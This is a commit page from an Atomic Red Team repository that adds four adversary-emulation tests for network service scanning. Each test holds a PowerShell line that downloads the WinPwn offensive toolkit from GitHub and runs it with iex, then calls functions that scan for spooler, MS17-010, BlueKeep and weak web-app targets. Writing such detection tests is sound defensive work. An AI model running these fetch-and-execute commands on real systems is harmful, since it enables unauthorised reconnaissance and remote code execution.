security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

T1046 - Added Service Scanning tests sourced from WinPwn script. (#1930)

Browse Source 
* Added Service Scanning tests sourced from WinPwn script.

Details:
https://github.com/S3cur3Th1sSh1t/WinPwn/

Testing:
Tested on Windows 10 VM

* make timeout comment generic to all execution frameworks.

* typo

Co-authored-by: dwhite9 <d0w019h@wal-mart.com>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
dwhite9
2022-05-07 21:01:47 -05:00
committed by GitHub
parent 6398d68728
commit f567ca01a1
1 changed files with 40 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1046/T1046.yaml
+40
View File
@@ -120,3 +120,43 @@ atomic_tests:
command: |
python #{filename} -i #{host_ip}
name: powershell
- name: WinPwn - spoolvulnscan
description: Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
name: powershell
- name: WinPwn - MS17-10
description: Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
name: powershell
- name: WinPwn - bluekeep
description: Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
name: powershell
- name: WinPwn - fruit
description: Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
name: powershell